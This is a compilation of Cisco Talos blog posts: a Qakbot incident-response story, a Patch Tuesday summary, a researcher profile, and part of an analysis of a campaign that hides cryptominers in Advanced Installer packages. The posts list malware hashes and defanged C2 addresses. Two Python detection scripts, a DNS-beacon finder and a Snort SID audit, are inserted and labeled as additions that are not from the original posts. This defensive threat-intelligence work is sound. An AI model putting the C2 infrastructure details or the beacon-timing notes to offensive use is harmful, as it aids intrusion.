Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation.

ATT&CKcon 4.0 (Oct. 24 - 25)

McLean, Virginia

Nicole Hoffman and James Nutland discuss the MITRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottom of reports and blogs without any context, never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.

Most prevalent malware files from Talos telemetry over the past week

SHA 256: 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647
MD5: bbcf7a68f4164a9f5f5cb2d9f30d9790
Typical Filename: bbcf7a68f4164a9f5f5cb2d9f30d9790.vir
Claimed Product: N/A
Detection Name: Win.Dropper.Scar::1201

SHA 256: d5763a87ec22a583b9dd853e31a9d4cb187d81251ce51099ce3d0f749bbf405a
MD5: 5cedec562076ac629453cc99dd0cdda6
Typical Filename: nYzVlQyRnQmDcXk
Claimed Product: N/A
Detection Name: W32.Auto:d5763a.in03.Talos

SHA 256: 4c3c7be970a08dd59e87de24590b938045f14e693a43a83b81ce8531127eb440
MD5: ef6ff172bf3e480f1d633a6c53f7a35e
Typical Filename: iizbpyilb.bat
Claimed Product: N/A
Detection Name: Trojan.Agent.DDOH

SHA 256: d5219579eec1819d52761730a72ce7a95ee3f598fcfd9a4b86d1010ea103e827
MD5: bf357485cf123a72a46cc896a5c4b62d
Typical Filename: bf357485cf123a72a46cc896a5c4b62d.virus
Claimed Product: N/A
Detection Name: W32.Auto:d5219579ee.in03.Talos

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
MD5: 7bdbd180c081fa63ca94f9c22c457376
Typical Filename: c0dwjdi6a.dll
Claimed Product: N/A
Detection Name: Trojan.GenericKD.33515991

How Cisco Talos IR helped a healthcare company quickly resolve a Qakbot attack

14 September 2023 at 12:00

Partnership and proactive measures reduce resolution time from weeks to mere hours.


Healthcare is one of the most popular targets for threat actors, as evidenced by the fact that it was the most-targeted sector in each of Cisco Talos Incident Response’s past two Quarterly Trends Reports.

But if these organizations are ready for when, not if, an incident occurs, they can avoid the worst-case scenario of potentially losing money, risking patient safety, or dealing with technology downtime.

Veradigm is a healthcare technology company that drives value through its unique combination of platforms, data, expertise, connectivity, and scale. The Veradigm Network features a dynamic community of solutions and partners providing advanced insights, technology, and data-driven solutions, all working together to transform healthcare insightfully. Veradigm recently detected an intrusion and potential information-stealing attack before bad actors could execute their plan.

Thanks to the Cisco Talos Incident Response Retainer service, Veradigm detected a potential Qakbot infection early, and with the help of the Cisco Talos Incident Response (Talos IR) team, evicted the threat actor from their network quickly before any harm could come to the organization or its customers.

Veradigm has partnered with Cisco for technology and services for years, with the ongoing goal of making Veradigm’s systems and network more resilient – the ability to protect every aspect of their business, withstand unpredictable threats or changes, and emerge stronger.

A few months ago, their team acted quickly when they noticed a potential security incident in a development environment and immediately reached out to Talos IR for assistance. The Talos IR team helped them swiftly deal with the attack which included attempts to deploy the modular information-stealer Qakbot.

Veradigm and the Talos IR team worked together to determine that adversaries had attempted to establish command and control (C2) via DNS. Although Veradigm had isolated the affected system via Cisco Secure Endpoint, the default isolation policy did not block DNS traffic; Cisco Umbrella blocked that traffic until the team modified the isolation policy to stop the DNS beaconing. Veradigm’s ability to prevent C2 highlights the value of its defense-in-depth strategy. The adversary attempted to penetrate the network, but because of the security controls and the quick response, it could not successfully deploy Qakbot.
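The DNS beaconing described above is the kind of signal a responder can pull from resolver logs while an isolation policy is still letting DNS through. The Python script below is an added example, not Talos IR’s or Veradigm’s tooling and not code from the original post. It assumes a simple constructed log format (ISO timestamp, client IP and queried name on each line) with sample lines made up for this illustration; it flags hosts that query one registered domain at near-constant intervals, the signature of a timer-driven check-in, and counts how many distinct subdomains they used, since C2 over DNS often encodes identifiers or data in the leftmost label.

```python
"""Flag hosts that query one domain at clockwork intervals, a common sign of DNS-based C2 check-ins."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample resolver log (not real telemetry): "<ISO timestamp> <client IP> <queried name>".
# 10.1.1.50 checks in with updates-cdn.test about every 60 seconds using a fresh subdomain each time;
# 10.1.1.77 is ordinary, irregular browsing of example.com.
SAMPLE_DNS_LOG = """\
2023-09-14T10:00:00 10.1.1.50 www.example.com
2023-09-14T10:00:05 10.1.1.50 a1b2c3.updates-cdn.test
2023-09-14T10:01:05 10.1.1.50 d4e5f6.updates-cdn.test
2023-09-14T10:02:06 10.1.1.50 a7b8c9.updates-cdn.test
2023-09-14T10:03:05 10.1.1.50 1122aa.updates-cdn.test
2023-09-14T10:04:06 10.1.1.50 33bb44.updates-cdn.test
2023-09-14T10:05:05 10.1.1.50 cc55dd.updates-cdn.test
2023-09-14T10:00:12 10.1.1.77 mail.example.com
2023-09-14T10:00:40 10.1.1.77 www.example.com
2023-09-14T10:07:13 10.1.1.77 cdn.example.com
2023-09-14T10:09:01 10.1.1.77 www.example.com
2023-09-14T10:30:44 10.1.1.77 www.example.com
2023-09-14T10:45:10 10.1.1.77 www.example.com
"""


def registered_domain(qname, labels=2):
    """Collapse 'a1b2c3.updates-cdn.test' to 'updates-cdn.test'.
    Assumes two-label registrable domains; a public-suffix list would be needed for e.g. .co.uk."""
    parts = qname.rstrip(".").lower().split(".")
    return ".".join(parts[-labels:])


def parse_log(text):
    """Group query timestamps and leftmost labels by (client, registered domain)."""
    events = defaultdict(lambda: {"stamps": [], "labels": set()})
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, qname = line.split()
        key = (client, registered_domain(qname))
        events[key]["stamps"].append(datetime.fromisoformat(ts))
        events[key]["labels"].add(qname.lower().split(".")[0])
    return events


def find_beacons(text, min_queries=5, max_jitter=0.2):
    """Return periodic (client, domain) pairs: at least min_queries lookups whose
    inter-arrival times vary by no more than max_jitter (coefficient of variation)."""
    hits = []
    for (client, domain), rec in parse_log(text).items():
        stamps = sorted(rec["stamps"])
        if len(stamps) < min_queries:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg <= 0:  # all lookups in the same second: burst, not a beacon
            continue
        jitter = pstdev(gaps) / avg  # ~0 means the lookups are on a timer
        if jitter <= max_jitter:
            hits.append({
                "client": client,
                "domain": domain,
                "interval_s": round(avg, 1),
                "jitter": round(jitter, 3),
                "distinct_subdomains": len(rec["labels"]),
            })
    return hits


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_DNS_LOG):
        print(hit)
```

On the constructed log this reports only 10.1.1.50 talking to updates-cdn.test at a 60-second interval with six distinct subdomains; the browsing host is skipped because its gaps vary wildly. Real malware adds randomized sleep, so tune max_jitter against your own baseline rather than treating 0.2 as a constant.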

This incident was resolved in hours, not days or weeks, because of Talos IR’s established relationship with Veradigm. The Talos IR team shared remediation recommendations to Veradigm to implement in the event threat actors attempted another intrusion. The swift action of the Talos IR team, coupled with the proactive preparation of the Veradigm team, resulted in a faster and more efficient response to the incident.

Dr. Jeremy Maxwell, the CSO at Veradigm, said, “We avoided worst case scenario due to our experience, practices, and relationships … by having the ‘good guys’ from Cisco join with our ‘good guys,’ we can navigate each situation to success.”

This is one of many customer success stories in which Talos IR sees, responds, and helps organizations across the globe fortify their readiness and defense.

The recent Cisco Cybersecurity Readiness Index study found that a mere 15% of organizations globally are deemed to have a mature level of preparedness to handle security risks. Those in the sectors with the most to lose tend to have more companies in the mature state of readiness, including healthcare (18%) and financial services (19%).


Dr. Maxwell said that because of his company’s retainer with Talos IR, he was lucky enough to count his company among those organizations who were ready for a cyber-attack.

“Working in a highly regulated domain, it is important that we establish good relationships with all partners, but incident response in particular,” Maxwell said. “We have been partnering with Cisco Talos IR since 2017, and across that time we have established a solid relationship with the same cast of characters through both proactive and reactive incidents. This has built a special level of trust and efficiency in response when we have those knowledgeable about our unique environment on our side and ready to be there.”

Veradigm chose Cisco Secure solutions based on several factors: the ease of integration with their existing hosting and corporate environment tools, plus being known in the industry as a strong performer. It just made sense, then, to partner with Talos IR for their incident response needs.

“With the [Talos IR] retainer service we really appreciate established and met Service Level Agreements (SLAs). Plus, the knowledge of Cisco’s IR team on our unique environment, prior incidents, and their intelligence on the latest threats ensure we smoothly navigate, and balance preparation exercises and incidents based on our unique needs. Time to response in our SLA along with the unique knowledge, there isn’t a delay as one would expect. They are ready and we have ‘muscle memory’ from both tabletop scenarios and real-life situations. As a result of being in the highly regulated world of healthcare and with the constant need to consider patient safety, our circumstances can be tense from the start. They know how we need to react based on both exercises and incidents and can navigate smoothly in delicate situations/balances with our unique needs in mind,” said Jeremy Maxwell, Veradigm CISO.

Having a trusted partner on Veradigm’s side who knows their environment, popular attacker tactics, techniques, and procedures (TTPs) and is familiar with regulatory obligations of the healthcare sector meant both sides could work together to achieve more. The strong connection is based on a solid foundational relationship grounded in expediency and knowledge, according to Maxwell.

“Cisco knows our structure, they know our IR plans, they know our privilege and information sharing practices, they know our regulatory obligations,” he said after the incident was resolved. “As a result of this unique relationship, we save precious minutes and hours in response time not having to bring them up to speed each time. They are already ready to go with our team side by side, step by step.”

Veradigm takes preparation seriously, not trying to formulate a plan during an active incident, but actively reviewing their IR plan and playbooks regularly. The company has also participated in multiple Talos IR tabletop exercises to stress test its processes and adjust as needed to respond and succeed more quickly.

“Preparation is crucial. During your IR, you cannot formulate a plan on how to respond and react,” Maxwell said. “When something does occur, we do what we planned, we have enabled ourselves to succeed with the IR plan in action. It’s not just theory — it’s practice.”


In this episode of the Cisco Security Stories podcast, Jeremy Maxwell talks through the incident step by step, and how Veradigm has benefitted from a close relationship with Talos Incident Response over many years.

An additional benefit Veradigm has from the retainer is the sharing of knowledge and experiences to not only apply during an incident but leveraging to boost the expertise of their in-house IR team.

“Another bonus is that due to the size of Cisco, their team is not only our ally, but also a fountain of information with their global network of responses and knowledge across the spectrum. We can leverage that experience and skillset to our advantage,” Maxwell said. “Cisco also brings professional backing and confidence to further expand our team of expertise and process.”

Are you looking to build or further enhance your incident response readiness program? We can help with the Cisco Talos Incident Response Retainer service. Connect with us to learn more:

Microsoft Patch Tuesday for September 2023 — Unusually low 5 critical vulnerabilities included in Microsoft Patch Tuesday, along with two zero-days

12 September 2023 at 20:51

Microsoft disclosed 65 vulnerabilities across its suite of products and software Tuesday, only five of which are considered critical, which is very low compared to Microsoft’s usual security updates.

However, there are two issues disclosed and patched this month that have already been exploited in the wild.

Fifty-six of the vulnerabilities included in this month’s Patch Tuesday are considered “important,” according to Microsoft, while two are of “moderate” severity. One remote code execution vulnerability in Microsoft Exchange Server, CVE-2023-36756, was meant to be included in August’s security update but was mistakenly excluded. Users should ensure the August 2023 security update for Exchange is already installed to remediate this issue.

One of the vulnerabilities adversaries are already exploiting in the wild is CVE-2023-36802, an elevation of privilege vulnerability in Microsoft Streaming Service, a corporate video sharing platform integrated into SharePoint and Office 365. An adversary who successfully exploits this vulnerability can gain SYSTEM privileges.

Additionally, CVE-2023-36761 has already been exploited in the wild and proof of concept code is publicly available. Although it is not clear how, exactly, an attacker could exploit this vulnerability in Microsoft Word, Microsoft states that the Preview Pane is also a potential attack vector in this case. If successful, an adversary could view NTLM hashes.

Another Word vulnerability included in Tuesday’s security update is CVE-2023-36762, which could lead to arbitrary code execution. An adversary could exploit this issue by tricking a user into opening a specially crafted Word document. It’s common for attackers to use this method and try to trick users into opening the document as an email attachment.

There are also four remote code execution vulnerabilities in Microsoft Visual Studio — CVE-2023-36794, CVE-2023-36796, CVE-2023-36792 and CVE-2023-36793 — that could be triggered if a user opens a specially crafted, weaponized file. This type of attack is particularly notable, as Google’s Threat Analysis Group reported that the high-profile Lazarus Group APT is using this method to target security developers and researchers on social media.

Lastly, we also believe CVE-2023-36745, CVE-2023-36756 and CVE-2023-36744 are worth highlighting. These are remote code execution vulnerabilities in Microsoft Exchange Server, which attackers are known to target as part of a variety of attacks.

A complete list of all the vulnerabilities Microsoft disclosed this month is available on its update page.

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 57193, 62385-62388, 62394-62396, 62401, 300687-300688.
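The SID list above mixes single IDs and inclusive ranges, and what a Snort operator actually wants to confirm after pulling the new rule pack is that every listed SID is present in the deployed rules file and not commented out. The Python script below is an added check, not part of the Talos post; the rules text embedded in it is constructed placeholder content for illustration only and does not reproduce any real Talos rule body.

```python
"""Expand a Talos SID list and confirm each SID is present and enabled in a Snort rules file."""
import re

# SID list as published in the Talos Patch Tuesday post (ranges are inclusive).
TALOS_SEPT_2023_SIDS = "57193, 62385-62388, 62394-62396, 62401, 300687-300688"

# Constructed placeholder rules for this example only; the real rule bodies ship in the
# Talos rule pack and are not reproduced here.
SAMPLE_RULES = """\
# constructed sample rules file
alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"SAMPLE enabled rule"; sid:62385; rev:1;)
# alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"SAMPLE disabled rule"; sid:62386; rev:1;)
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"SAMPLE enabled rule"; sid:300687; rev:2;)
alert tcp any any -> any any (msg:"SAMPLE unrelated rule"; sid:1000001; rev:1;)
"""

# Snort rule option syntax: "sid:<number>;" inside the option parentheses.
SID_RE = re.compile(r"\bsid\s*:\s*(\d+)\s*;")


def expand_sids(spec):
    """Turn '57193, 62385-62388' into {57193, 62385, 62386, 62387, 62388}."""
    sids = set()
    for part in spec.split(","):
        part = part.strip()
        if not part:
            continue
        if "-" in part:
            lo, hi = (int(x) for x in part.split("-", 1))
            sids.update(range(lo, hi + 1))
        else:
            sids.add(int(part))
    return sids


def audit_ruleset(rules_text, wanted):
    """Map each wanted SID to 'enabled', 'disabled' (commented out) or 'missing'."""
    status = {sid: "missing" for sid in wanted}
    for raw in rules_text.splitlines():
        line = raw.strip()
        match = SID_RE.search(line)
        if not match:
            continue  # blank line, plain comment, or a line without a sid option
        sid = int(match.group(1))
        if sid in status:
            status[sid] = "disabled" if line.startswith("#") else "enabled"
    return status


def gaps(status):
    """SIDs that still need attention, sorted, with their state."""
    return sorted((sid, state) for sid, state in status.items() if state != "enabled")


if __name__ == "__main__":
    wanted = expand_sids(TALOS_SEPT_2023_SIDS)
    for sid, state in gaps(audit_ruleset(SAMPLE_RULES, wanted)):
        print(f"sid:{sid} {state}")
```

Point audit_ruleset at the concatenated contents of your active rules files; anything reported as missing usually means the SRU or rule pack has not been applied yet, and anything disabled means a local policy commented it out and should be reviewed before assuming coverage for this month’s vulnerabilities.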

You can try to hide your firmware from Kelly Patterson, but she’ll find it (and break it)

11 September 2023 at 12:00

How her work illustrates the difference Talos’ vulnerability research team makes


When Kelly Patterson first learned how to code by making small programs in her high school class, she preferred breaking her creations to building them.

She’d make a game and then spend double the time debugging that same code, looking for holes in her work.

Today, she’s always looking for what’s wrong with other people’s code, whether that be in a wireless router, IoT speaker, or an open-source software stack that dates back to 1991.

Patterson is one of the researchers that make up Talos’ Vulnerability Discovery team, a group of reverse-engineers, penetration testers and general expert coders who look for vulnerabilities in firmware, software and hardware and help the creators fix those issues.

Patterson and her teammates are responsible for helping to disclose and patch more than 200 security vulnerabilities a year, some of which affect devices used in thousands of households around the world, and others that support everything from industrial control systems to critical infrastructure.

Specifically for Patterson, she enjoys looking at hardware and its accompanying firmware. She began her IT career as a systems engineer but quickly found that she was more interested in debugging what she was working on, so she started pursuing projects outside of the office that allowed her to reverse-engineer code and talk about it publicly. This eventually led her to Talos, which was specifically attractive because it allowed her to be a researcher full-time.

“I like to spread the word that these bugs are still out there and we’re finding them, proving that we haven’t ‘solved’ security completely,” Patterson said.

One of her first and most memorable projects at Talos was looking at a series of programmable logic controllers (PLCs) made by WAGO, a German company specializing in automation solutions. She teamed up with other researchers to approach these devices from different angles, trying to dissect what attack surface existed, exactly. By the time their research was public, they had found several critical vulnerabilities in two WAGO PLCs that could allow a remote, unauthenticated attacker to execute arbitrary code on the devices or cause a denial of service by sending specially crafted packets.

Patterson performing with her improv troupe.

Patterson specifically focused on the cloud-connected portion of the software, which opened her eyes to the attack surface that cloud storage and communication presents.

“That was fun research for me. It helped open my eyes to the fact that the cloud is an attack vector for embedded devices,” she said. “Myself, Carl [Hurd] and Patrick [DeSantis] split it up and came at it from different angles — it was a great device to research because it was so customizable and had a huge attack surface.”

That research led her to look at more industrial control systems and internet-of-things devices that are virtually always on and talking to the network. Right now she’s examining various open-source software stacks that ICS environments typically use and has multiple fuzzers running to search for potential code vulnerabilities.

As Patterson puts it, not all code bugs are vulnerabilities, but all vulnerabilities are bugs β€” it’s up to her to determine if a bug could allow a bad actor to carry out any undesirable action. Once she confirms a vulnerability exists, her team reports it to the vendor (all adhering to Cisco’s third-party vulnerability disclosure policy) and works with them to create a patch. Then, she also has to confirm that that patch works and fixes the issue, which isn’t always the case.

“I think a lot of times vendors patch the bugs we find, but I think it provides a way for other developers to look into what kind of bugs they’re hiding and accidentally actually designing and creating into their products. Hopefully, this information helps them so other vendors’ bugs don’t end up in the wild,” she said.

When she starts any research into a particular product, her endgame is usually to gain access to the firmware. Many times, vendors will do everything they can to hide the firmware, so she’ll develop a method to intercept a firmware update or look for ways she can physically access the device’s inner workings to exploit any vulnerabilities that exist there.

“I try to think of things that I know are commonly used and would have a large impact if they were compromised. In the past, that’s been a lot of ICS,” Patterson said. “Or maybe it’s a new architecture or framework that I haven’t worked with before.”

All this research has made Patterson slightly more paranoid than the average user: she always opts for the “dumb” version of any appliance or electronic device she brings into her home to limit the number of devices connected to her home network. But she doesn’t balk at using certain IoT devices like home assistants or smart speakers, either, because she trusts certain manufacturers’ internal testing teams who look for vulnerabilities before a product is released.

Though she’s now four-plus years into her career as a vulnerability researcher, Patterson was not always sure she was going to stay on this path.

During the COVID-19 pandemic, she elected to leave her role at Talos to be a stay-at-home mom while her children couldn’t attend school in person.

“I was scared — it was a really tough time,” Patterson said. “And I hadn’t ever been solely responsible for caring for my children all the time. But it ended up being a really good experience.”

Patterson spent about 21 months away from work, during which she questioned whether she wanted to keep at her vulnerability research or look down another IT-related career path. After taking on some personal projects at home and mulling it over, she decided to re-apply for an opening at Talos and re-joined the vulnerability research team in September 2022 part-time.

She currently works a half-time schedule to balance her duties as a mom and her work.

“That was a lot of personal growth for me to figure out a work-life balance, which I never was forced to do before until [crap] hit the fan,” Patterson said.

Patterson has several interests outside of work, including rock climbing.

Patterson said her current goals are built around writing and creating new tools she can use to examine firmware and software. She often learns more from the process of building those tools than from examining the vulnerabilities themselves.

And while she does enjoy breaking apart routers every now and then, she said she views her work creating fuzzers and other tools for examining code as part of the larger vulnerability puzzles her team works on.

“That’s the major benefit of working on a team: we all have our own specialties,” she said. “It can feel challenging because you can feel like you get stuck, but that’s where other people come in to make suggestions or push you over the hump.”

A secondhand account of the worst possible timing for a scammer to strike

7 September 2023 at 18:00

Welcome to this week’s edition of the Threat Source newsletter.

Up until last week, I had never considered the timing of a scam to be important. I’m so used to just swiping away emails or text messages at random times during the day that I’d never considered what would happen if an adversary happened to get me at just the right time.

That’s what happened to my wife last week.

We were on vacation, and I was away for a few hours at lunch with my friends while she and the other spouses stayed back with our children to hang out at the pool for a bit.

She received a text message from an unknown number asking her to confirm a Zelle payment to someone she had never heard of for a not-insignificant amount of money. Not even a minute later, she received a call from the same number from someone claiming to represent our bank, asking if the transaction was fraudulent and if she could provide some personal information to verify the transaction or cancel it.

In most cases, she probably would have put them on hold and Googled the number to see if it was legitimate or logged into her online account to view her recent transactions. The problem was this scammer had hit her at the worst possible time. It was right in the middle of a diaper change for our 10-month-old daughter, and she was trying to change our daughter out of a wet bathing suit and stop her from crying because they were just a few minutes away from naptime.

Already in a panic (and not to mention exhausted from the heat at the beach), she answered the phone call and listened to the person on the other end of the line, growing increasingly frustrated and just wanting to end the phone call as quickly as possible so she could return her attention to our daughter, while trying to make sure we weren’t legitimately about to be scammed out of money.

Our friends thankfully intervened after she put the phone on speaker, and they all noticed some similar red flags and she ended the conversation before giving away any significant information the scammer didn’t already seem to have.

But it did get me thinking about how the timing and urgency of these scams can make such a difference. I can’t say the same thing wouldn’t have happened to me had I been in the middle of a diaper change and having to worry about something as stressful as money. Or what if they had caught my wife while she was in the car and didn’t have the internet or friends at her disposal?

This timing was purely blind luck on the attacker’s part, but it nonetheless almost worked out for them. I’m not trying to throw my wife under the bus or anything, I just wanted to use this story to illustrate that anyone can be a target of these types of scams at any time, and the scammers don’t care if you have to change a dirty diaper or not.

The one big thing

Cybercriminals are abusing Advanced Installer, a legitimate Windows tool used for creating software packages, to drop cryptocurrency-mining malware on infected machines, new Cisco Talos research shows. The campaign, active since late 2021, appears to primarily target French-speaking graphic designers and other engineers who rely on 3-D modeling software. Cybercriminals are likely targeting these users because this type of software requires powerful GPUs, which also happen to be extremely useful for mining cryptocurrency.

Why do I care?

This campaign specifically targets business verticals such as architecture, engineering, construction, manufacturing and entertainment, though anyone using a computer of any type could be a target of a cryptocurrency mining malware. The attackers’ use of Advanced Installer also allows the backdoors used in this campaign to often slip by undetected.

So now what?

Cisco Secure Endpoint users can use Orbital Advanced Search to run osquery queries to see if their endpoints are infected with this specific threat. And if you’re ever curious about what your GPU is up to, use Task Manager on Windows or Activity Monitor on Mac to check out what your machine’s computing power is going toward. There are also specific Cisco Secure protections available that we outlined in Talos’ blog on this campaign.

Top security headlines of the week

With students around the globe going back to school over the past few weeks, cyber attacks against the education sector are back in the spotlight. This time of year is often a popular time for attackers to strike against schools, colleges and universities because their systems are under the most stress at the start of a new school year. Private security companies in the U.K. issued public warnings to school leaders that their systems are likely not prepared for a sophisticated threat actor, days after a school in northern London had to delay its start date by six days due to a cyber attack. More than 100,000 people may have also had their personal information stolen as the result of a data breach against Minneapolis’ school district, with the Medusa ransomware group claiming it was behind the attack. Although the intrusion took place in February, the district last week sent home letters to students and parents describing the results of an investigation into the breach. (The Record by Recorded Future, Yahoo! News, BBC)

The FBI announced last week that it successfully dismantled the infamous Qakbot botnet. Known as “Operation: Duck Hunt,” the takedown involved the FBI deploying an in-house uninstaller tool to Qakbot-infected devices. International law enforcement also seized Qakbot infrastructure located in the U.S. and across Europe. In the announcement of the takedown, U.S. officials blamed Qakbot for more than 40 ransomware attacks over the past 18 months, generating $58 million in ransom payments. Authorities also seized millions of dollars’ worth of cryptocurrency from Qakbot, which they are working to return to the original owners. However, security researchers are warning that the botnet likely isn’t gone for good, as the operators and creators of Qakbot apparently remain at large, and these types of botnets typically find ways to be reborn after takedowns. (BankInfoSecurity, TechCrunch)

Researchers and reporters at “Wired” have unmasked one of the leaders of the Trickbot threat actor. A 41-year-old is allegedly behind the online monikers “Bentley” and “Manuel,” who are known as the creators of Trickbot. The investigation also uncovered potential connections between Trickbot and the Russian government and other cybercriminal gangs. Thousands of messages in a Trickbot group chat were leaked last year, which included sensitive information researchers have been able to use to unmask some of the group’s operations. A single CEO-like figure also appears to be at the helm of both Trickbot and the Conti ransomware gang, receiving daily updates on the groups’ operations, the messages show. (Wired, NISOS)

Can’t get enough Talos?

Upcoming events where you can find Talos

LABScon (Sept. 20 - 23)

Scottsdale, Arizona

Vitor Ventura gives a detailed account and timeline of a mercenary spyware organization, from near bankruptcy to having fully working spyware targeting iOS and Android with one-click zero-day exploits.

Grace Hopper Celebration (Sept. 26 - 29)

Orlando, Florida

Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation.

ATT&CKcon 4.0 (Oct. 24 - 25)

McLean, Virginia

Nicole Hoffman and James Nutland discuss the MITRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottom of reports and blogs without any context, never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.

Most prevalent malware files from Talos telemetry over the past week

SHA 256: d5219579eec1819d52761730a72ce7a95ee3f598fcfd9a4b86d1010ea103e827
MD5: bf357485cf123a72a46cc896a5c4b62d
Typical Filename: bf357485cf123a72a46cc896a5c4b62d.virus
Claimed Product: N/A
Detection Name: W32.Auto:d5219579ee.in03.Talos

SHA 256: 1fa0222e5ae2b891fa9c2dad1f63a9b26901d825dc6d6b9dcc6258a985f4f9ab
MD5: 4c648967aeac81b18b53a3cb357120f4
Typical Filename: iptjqbjtb.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Scar::1201

SHA 256: 975517668a3fe020f1dbb1caafde7180fd9216dcbf0ea147675ec287287f86aa
MD5: 9403425a34e0c78a919681a09e5c16da
Typical Filename: vincpsarzh.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Scar::tpd

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
MD5: 7bdbd180c081fa63ca94f9c22c457376
Typical Filename: c0dwjdi6a.dll
Claimed Product: N/A
Detection Name: Trojan.GenericKD.33515991

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
MD5: 2915b3f8b703eb744fc54c81f4a9c67f
Typical Filename: VID001.exe
Claimed Product: N/A
Detection Name: Win.Worm.Coinminer::1201

Cybercriminals target graphic designers with GPU miners

7 September 2023 at 12:00
  • Cybercriminals are abusing Advanced Installer, a legitimate Windows tool used for creating software packages, to drop cryptocurrency-mining malware on infected machines. This activity has been ongoing since at least November 2021.
  • The attacker uses Advanced Installer to package other legitimate software installers, such as Adobe Illustrator, Autodesk 3ds Max and SketchUp Pro, with malicious scripts and uses Advanced Installer's Custom Actions feature to make the software installers execute the malicious scripts.
  • The software installers targeted in this campaign are specifically used for 3-D modeling and graphic design, and most of them use the French language, indicating that the victims are likely across business verticals, including architecture, engineering, construction, manufacturing, and entertainment in French language-dominant countries.
  • The payloads include the M3_Mini_Rat client stub, which allows the attacker to establish a backdoor and download and execute additional threats; the Ethereum cryptocurrency-mining malware PhoenixMiner; and lolMiner, a multi-coin mining threat.
  • Cybercriminals are likely exploiting these particular software installers because of their need for high Graphics Processing Unit (GPU) power to function, which adversaries rely on to mine cryptocurrency.

Victimology

The attacks predominantly target users in France and Switzerland, with a few infections in other geographic areas, including the U.S., Canada, Algeria, Sweden, Germany, Tunisia, Madagascar, Singapore and Vietnam, according to our analysis of the DNS request data sent to the attacker’s command and control (C2) host. Most of the software installers used in this campaign are written in French, supporting our observation that this campaign primarily targets French-speaking users.

The campaign likely affects business verticals such as architecture, engineering, construction, manufacturing and entertainment, as the attackers use software installers specifically created for 3-D modeling and graphic design. These industries are likely attractive targets for illicit cryptomining as they use computers with high GPU specifications and powerful graphics cards useful for generating cryptocurrency.

Campaign overview: Cybercriminals abuse Advanced Installer to execute cryptominers

Talos discovered an ongoing illicit cryptocurrency mining campaign that deploys malicious payloads by abusing the tool Advanced Installer. This is a legitimate tool designed to create software packages for Windows. However, the attackers used it to package legitimate software installers with malicious PowerShell and Windows batch scripts. These malicious scripts are executed using Advanced Installer’s Custom Action feature, which allows users to predefine custom installation tasks. The final payloads are PhoenixMiner and lolMiner, publicly available miners relying on computers’ GPU capabilities.

Figure: An example of a software installer packaged with malicious scripts using Advanced Installer.

In the same time frame, we also observed that the attacker deployed the M3_Mini_Rat client stub using tactics, techniques and procedures (TTPs) that are highly similar to the mining activity. A stub is a piece of code that translates parameters sent between the client and server during a remote procedure call. The M3_Mini_Rat client stub is a PowerShell script generated by M3_Mini_Rat that establishes a backdoor to the victim's machine. We could not determine whether this backdoor was leveraged for cryptomining; however, we assessed the activity as likely part of the same mining campaign that deployed PhoenixMiner and lolMiner. In both instances, the attacker abused Advanced Installer and its Custom Actions feature to deploy malicious scripts, and the attack sequences and naming conventions are highly similar, as detailed in the methodology section below.

Attacker’s infrastructure

Analysis of the infrastructure used in this campaign revealed location data for the attacker-controlled C2 servers and other malware deployed from these servers in previous campaigns. The C2 server had the domain sysnod[.]duckdns[.]org, which resolved to the IP 104[.]244[.]76[.]183 in Luxembourg. Based on passive DNS resolution data, we discovered the domain sysnod[.]duckdns[.]org had previously resolved to the IPs 79[.]134[.]225[.]70 and 79[.]134[.]225[.]124 in Germany. In different malicious campaigns, these servers were operated as C2 servers for various RATs, including Nanocore, njRAT and AsyncRAT, suggesting that they were likely used by the same attacker in their previous campaigns. In another iteration of this mining campaign, the attacker had a malicious download server with the IP address 51[.]178[.]39[.]184 in France, which staged the intermediate PowerShell loaders, the encrypted PowerShell launcher scripts, PhoenixMiner and lolMiner.

